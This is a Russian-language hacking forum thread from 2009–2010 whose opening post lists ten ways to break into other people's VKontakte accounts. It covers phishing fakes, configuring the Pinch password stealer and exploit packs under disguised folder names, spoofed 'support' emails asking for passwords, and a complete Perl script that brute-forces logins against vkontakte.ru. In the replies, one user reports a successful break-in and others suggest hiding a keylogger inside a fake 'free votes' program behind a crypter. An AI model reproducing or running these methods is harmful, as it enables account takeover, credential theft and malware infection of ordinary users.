Вернуться   D3Scene.Ru Софт портал игр | Хаки | Проги | Статьи > Другое > Социальные Сети > ВКонтакте
Присоединяйся к нам

ВКонтакте Самая популярная социальная сеть в России.



Ответ
 
Опции темы Опции просмотра
Старый 16.12.2009, 09:00   #1
Освоившийся


 
Аватар для ParniSha
 
Регистрация: 11.10.2009
Адрес: Panama
Сообщений: 648
Репутация: 475
Автор Сообщение

10 способов взлома анкеты Vkontakte.ru


Что нам потребуется:
Умение настраивать пинч(если это у вас уже получилось, то остальные 2 требования можно не смотреть)
Прямые руки
Хоть капелька мозга
1) Через мыло, если мы его знаем то уже все проще, ведь имеется как минимум 15 методов взлома почты...НО есть и еще один минус, если пароль "корявый", он

разумеется надежный, но с его восстановлением проблемы, когда такой высылают на почту, то он принемает "левый" вид, и соответственно не работает. не в этом

суть, поэтому останавливаться не будем
2) Фейк, достаточно простой способ, кидаем ссылку жертве любым способом(ася, через лс и тд) скачать его можно по ссылке [Ссылки скрыты от гостей.]
3) Троян. Эту категорию мы разделим на другие.
а) Скинуть "чистый" файл, либо ссылку на загрузку его, но тут еще надо чтобы пользователь его запустил. [Ссылки скрыты от гостей.] - здесь лежит билдер пинча, а

здесь парсер [Ссылки скрыты от гостей.] , если вы захотите чтобы отчеты шли на гейт - вот подходящий от Генома - [Ссылки скрыты от гостей.]
б) кейлогер - менее полезный, но если жертва его "словит" и вы покопаетесь(причем оочень долго) с отчетом, то пароль получите 100%
в) Сплоит, тут ничего сложного нету, НО ЕСТЬ МИНУС! Паблик сплоиты пробивают в основном ие6 и то, примерно, 6/10(имхо)
Советую армитаж(айс пак тоже в теме). Прост в настройке, нужно только создать базу мускуль(делается в пару кликов), и отредактировать файлы(db.php

config.php), после того как зальете на хост, выставляем нужные права, на папку load - 777. config.php - 777
Скачать 3 связки можно по ссылке [Ссылки скрыты от гостей.] - здесь лежат мпак, айспак и армитаж
ЗЫ когда будете настраивать пинч, устанавите права на гейт 775, на папку в которую будут идти отчеты - 777, и не забывайте что не надо называть папку с

отчетами OtchetyOTpincha, имхо палевно, лучше назовите 404 или еще как, ну что бы внимания не привлекало...Папку в которой будет лежать сплоит, тоже

переиминуйте на что-нить типа myphotos и тд... тк люди будут эту ссылку себе в браузер пихать, не нужно что бы там было написанно EXPLOIT...лишнее палево ни

к чему...
Идем дальше...
Надеюсь, пинч уже настроен на гейт или почту, желательно что бы он еще и закриптованный был.
Заходим по ссылке на файл install.php нашего сплоита, а потом идем в админку, устанавливаем настройки, выбераем файл который будет грузится жертве, теперь он

будет лежать в папке load под именем file.
Кидаем ссылку жертве, и ждем с надеждой что ее пробьет и отчет с паролем нам придет.
4)Брутфорс, как всем известно - перебор паролей. Способ долгий, и не всегда сработает(в случае пароля D5&%-AefV)
Для этого брутфорсера нам потребуется активперл скачать мона тут [Ссылки скрыты от гостей.] либо по ссылке

[Ссылки скрыты от гостей.]
Код брутфорсера:
Цитата:
код:

#!/usr/bin/perl

use IO::Socket;
use MD5;
use threads;
use threads::shared;
my @pass : shared;

open (pass, "<$dic");

Next:
@pass = pass();

for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);}
for(@trl) { $_->join; }

sub Brut
{

while (@pass){

$pass = shift @pass;

$md5 = MD5->hexhash($pass);
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPor t=>80);
print $sock "HEAD [Ссылки скрыты от гостей.] HTTP/1.0\r\n".
"Host: vkontakte.ru\r\n".
"Accept: */*\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"User-Agent: Mozillo\r\n".
"Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n".
"Connection: close\r\n\r\n";
$answ = <$sock>;
close $sock;
print "$pass $answ";
if ($answ =~ /302/){
open (good, '>>good.txt');
print good "$id:$pass:$md5\n";
print "$id:$pass:$md5\n";
close good;
exit;}
}

}

goto Next;

sub pass
{
my (@mas);
while (<pass>){
push @mas, $_;
last if (@mas == 400);
}
chomp @mas;
return @mas;
}
Не забудьте сменить разширение на brut.pl
$dic = ‘passl.txt’; #паслист для брдутфорсера
$id = 1; #айдишник цели(его можно взять из адресной строки когда вы зашли на страницу жертвы)
$mail = ‘мыло’; #мыло, значек @ меняем на %40
$threads = Х; # где Х - количество потоков
Если вам лень копаться со всем этим, то есть неплохой брут на С. Скачать его можно по ссылке [Ссылки скрыты от гостей.], сразу говорю, если не запускается - это

ваши проблемы, ибо все прекрасно работает!
5)Имхо самый надежный способ, открываем исходник нашего фейка, закидываем в него наш код ******...
Теперь, когда жертва перейдет на нашу ссылку, мы увеличиваем вероятность того, что юзера пробьет, либо через браузер, либо через тупость, тк теперь у нас на

ссылке комбинированная атака на мозг(фейк) и браузер(код ******).
6)Способ приводится много где, здесь нужно поискать сайты на которых сидит жертва(форумы, почта и пр) и попытаться похекать что-то из вышеперечисленного,

авось найдем старый заброшенный пароль, а он подойдет.
7) как обычно СИ, пробуем отправить письмо от адресата [Ссылки скрыты от гостей.] или [Ссылки скрыты от гостей.] с текстом типа, ваша страница на сайте vkontakte.ru будет

заблокированна через N дней, если вы не подтвердите какую-нить хрень, методом отправки нам пароля.
Или, можно прислать письмо типа, вам пришло личное сообщение/открытка и пр, от такого-то пользователя, что бы ее прочитать перейдите по ссылке, а ссылка

будет вести на наш фейк.
Что-бы отправить письмо с "левого" адреса, нужен какой-нить майлер, например, этот [Ссылки скрыты от гостей.], либо любой подходящий для вас

из гугла.
Только не забудьте зарегить себе не привлекающее мыло, похожее на суппортское, и вписать его в поле копия.(что бы пароли пришли именно вам на почту)
8) Снифер, тут лучше отправлять его на почту(если мы знаем мыло), тогда мы без лишних проблем сможем перехватить сессию, и с помощью системы восстановления

пароля на сайте вконтакте получить письмо с паролем.
[Ссылки скрыты от гостей.]
Есть сниферы и получше, но они платные, все же тема распространена и в гуле можно ввсести запрос на пхп снифер и найти много полезной инфы.
9)ХSS, паблик дырок на этом сайте нету, так что кража кукисов маловероятна, хотя если ооочень долго подождать, то можно и дождаться паблик уязвимости - но

такой подход к делу бредовый, поэтому останавливаться на нем не будем.
10) Самый простой способ, единственное что от вас требуется - уметь работать с платежными системами и иметь деньги. Просто закажите взлом если вам не помог

Перед тем как задать вопрос воспользуйтесь полезными ссылками:
google.ru
  Ответить с цитированием Наверх
Пользователь сказал cпасибо:
GreKa|B$| (16.12.2009)
Старый 16.12.2009, 18:38   #2
Гость_за_инактив
 
Аватар для GreKa|B$|
 
Регистрация: 08.12.2009
Адрес: Алматы
Сообщений: 5
Репутация: -1
По умолчанию

1 я попробовал 1ым способом
Все получилось хатя какгто ламера словил)
+1 автору и спс
  Ответить с цитированием Наверх
Старый 16.12.2009, 19:12   #3
Матерый

 
Аватар для FlopS
 
Регистрация: 17.06.2009
Адрес: DC-city
Сообщений: 219
Репутация: 151
Отправить сообщение для FlopS с помощью ICQ
По умолчанию

А как же кража кукис? Способом СИ разговорить жертву ввести "прикольный скрипт от которого картинки летают". У меня где то валялся такой скрипт, если кому надо могу поискать.
  Ответить с цитированием Наверх
Старый 22.05.2010, 16:22   #4
Гость_за_инактив
 
Аватар для Vash-Vrag
 
Регистрация: 22.05.2010
Сообщений: 2
Репутация: -1
По умолчанию

под номером 9 ты пишеш про активную xss а пассивной xss взломать можно.
в категорию 3 забыли написать про стилеры и пинч туда тоже подходит.
  Ответить с цитированием Наверх
Старый 30.05.2010, 01:16   #5
Гость_за_инактив
 
Аватар для sh1n3
 
Регистрация: 21.11.2008
Адрес: Garena gaming community
Сообщений: 43
Репутация: 47
Отправить сообщение для sh1n3 с помощью ICQ
По умолчанию

1.угон мыла в наше время мало что решит так как люди которые ценят свою страницу и знают что мыло могут угнать привязывают её к телефону.
2.никакой нормальный человек не перейдёт по левой ссылке вконтакте. так поступают только ламеры. единственный как на меня вариант засунуть в гиперссылку кривой адрес а в самом названии написать что-то типа "vkontakte.ru"
3.так же и с мылом, я лично никогда не поверю что мне написал сам Дуров.
4.брут расчитан на пароли типа 123456, а при полном пусть даже 6-ти значном переборе символов вариантов будет не менее 3кк + время, затраты на прокси и антикапчу.
__________________
imma sh1n3
  Ответить с цитированием Наверх
Старый 30.05.2010, 02:01   #6
Lost


 
Аватар для N.e.o.
 
Регистрация: 20.08.2009
Адрес: Matrix
Сообщений: 1,028
Репутация: 802
По умолчанию

мне постоянно приходят писть от [Ссылки скрыты от гостей.] что они от меня хотят?
__________________

[Ссылки скрыты от гостей.]
[Ссылки скрыты от гостей.]
По женским представлениям, под покровом темноты мужчины могут думать только о сексе. Это неправда. Днем они тоже о нем думают.*face2*
  Ответить с цитированием Наверх
Старый 30.05.2010, 17:47   #7
Освоившийся


 
Аватар для ParniSha
 
Регистрация: 11.10.2009
Адрес: Panama
Сообщений: 648
Репутация: 475
Автор По умолчанию

N.e.o., тоже самое... и там тупо одно слово вроде, не помню какое)
  Ответить с цитированием Наверх
Старый 11.06.2010, 18:15   #8
Бан
 
Аватар для crixal
 
Регистрация: 08.06.2010
Сообщений: 12
Репутация: -5
По умолчанию

Флопс!,не в каждом браузере можно взломать кукис))в основном Опера,не знаю как на остальных,но через оперу я взломал кореша)потом оч долго ржал над ним)
  Ответить с цитированием Наверх
Старый 21.06.2010, 20:57   #9
Местный
 
Аватар для Filty
 
Регистрация: 17.06.2009
Адрес: устьпездинск
Сообщений: 117
Репутация: 123
Отправить сообщение для Filty с помощью ICQ
По умолчанию

кто скажет как или поможет "взломать" страницу)
пароль забыт и почта левая (но имеется)
если надо то там по ссылке какой пройду с акка)
буду благодарен и плюсом одним не обойдётся) отсыплю пару гарена акков и номеров асек)
  Ответить с цитированием Наверх
Старый 24.06.2010, 11:12   #10
* Гарант и Проверяющий



 
Аватар для h4ckeR
 
Регистрация: 08.05.2009
Сообщений: 1,210
Репутация: 1184
Отправить сообщение для h4ckeR с помощью ICQ Отправить сообщение для h4ckeR с помощью Skype™
По умолчанию

Ты спрашиваешь как взломать страницу, даже не прочитав что наверху написано.
Там очень много способов, и если не знаком с основами (как минимум), то можешь даже не пытаться.
  Ответить с цитированием Наверх
Старый 20.07.2010, 16:48   #11
Бан

 
Аватар для San-benito
 
Регистрация: 05.07.2010
Адрес: На Марсе
Сообщений: 399
Репутация: 104
Отправить сообщение для San-benito с помощью ICQ
По умолчанию

как по мне,то легче через радмин закинуть кейлогера..и может кроме вк достанится чтото по серьёзнее))

(извените за ошибки,на ноуте клавиш нету))
  Ответить с цитированием Наверх
Старый 20.07.2010, 23:15   #12
Рядовой
 
Аватар для Nixonotoon
 
Регистрация: 25.06.2010
Адрес: Буденновск
Сообщений: 18
Репутация: 3
Отправить сообщение для Nixonotoon с помощью ICQ Отправить сообщение для Nixonotoon с помощью Skype™
По умолчанию

вооще не шарю ((( хотелось впаймать суть мыслей но не могу (((((
  Ответить с цитированием Наверх
Старый 21.07.2010, 11:09   #13
Бан

 
Аватар для San-benito
 
Регистрация: 05.07.2010
Адрес: На Марсе
Сообщений: 399
Репутация: 104
Отправить сообщение для San-benito с помощью ICQ
По умолчанию

ты прочитай как называется ета тема и то,что написал [Ссылки скрыты от гостей.]
у меня вопрос...ведь можно както обьеденить кейлогер с другой програмкой..всмысле запускаеш прогу,а с ней и кейлогер незаметно???
  Ответить с цитированием Наверх
Старый 21.07.2010, 15:56   #14
Освоившийся


 
Аватар для ParniSha
 
Регистрация: 11.10.2009
Адрес: Panama
Сообщений: 648
Репутация: 475
Автор По умолчанию

San-benito, вообще то именно так и делается
типа например прога дающая голоса, в неё кеулоггер вставляешь и всё...
  Ответить с цитированием Наверх
Старый 22.07.2010, 09:33   #15
This? On Melancholy Hill




 
Аватар для UnDeaDRoCUser
 
Регистрация: 18.09.2008
Адрес: system32
Сообщений: 5,237
Репутация: 1415
Отправить сообщение для UnDeaDRoCUser с помощью ICQ Отправить сообщение для UnDeaDRoCUser с помощью Skype™
По умолчанию

Цитата:
Сообщение от ParniSha) Посмотреть сообщение
типа например прога дающая голоса, в неё кеулоггер вставляешь и всё...
+криптор ты забыл сказать.
__________________
[ [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | [Ссылки скрыты от гостей.] | ]

[ [Ссылки скрыты от гостей.] ]

  Ответить с цитированием Наверх
Ответ


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 
Опции темы
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход


Powered by vBulletin
Copyright © 2017 vBulletin Solutions, Inc.
Перевод: zCarot | Дизайн: G-A | Верстка: OldEr
Текущее время: 13:45. Часовой пояс GMT +4.